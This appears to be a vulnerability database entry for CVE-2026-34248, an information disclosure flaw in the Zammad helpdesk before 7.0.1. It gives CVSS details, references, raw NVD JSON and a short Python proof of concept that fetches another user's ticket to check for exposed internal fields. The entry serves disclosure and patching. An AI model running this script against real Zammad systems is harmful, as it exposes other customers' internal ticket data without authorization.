CVE-2026-34248

Description

Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (means they can see each other's tickets) could see fields which are not intended for customers - including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these field. This vulnerability is fixed in 7.0.1.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:* - VULNERABLE

Zammad < 7.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# This script demonstrates how an attacker might verify the vulnerability by fetching a ticket.
# Requires valid credentials for a customer in a shared organization.

TARGET_URL = "https://example.zammad.com/api/v1/tickets/{ticket_id}"
HEADERS = {
    "Authorization": "Bearer <VALID_CUSTOMER_TOKEN>",
    "Content-Type": "application/json"
}

def check_info_disclosure(ticket_id):
    """Check if sensitive fields are exposed in the ticket response."""
    response = requests.get(TARGET_URL.format(ticket_id=ticket_id), headers=HEADERS)
    
    if response.status_code == 200:
        data = response.json()
        # Check for fields that should be hidden from customers
        sensitive_fields = ['priority', 'internal_note', 'custom_internal_field']
        found_fields = [field for field in sensitive_fields if field in data]
        
        if found_fields:
            print(f"[+] Vulnerability Confirmed! Exposed fields: {found_fields}")
            print(f"[+] Ticket Data: {data}")
        else:
            print("[-] Sensitive fields not exposed in this ticket.")
    else:
        print(f"[!] Request failed with status code: {response.status_code}")

if __name__ == "__main__":
    # Replace with a Ticket ID from another user in the same shared organization
    check_info_disclosure(123)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34248
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34248
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34248/
[4] VulDB https://vuldb.com/cve/CVE-2026-34248
[5] https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34248", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:21.567", "lastModified": "2026-04-17T15:48:48.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (means they can see each other's tickets) could see fields which are not intended for customers - including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these field. This vulnerability is fixed in 7.0.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "830AF7C5-9441-4C80-935E-C53BDB097BB1"}]}]}], "references": [{"url": "https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}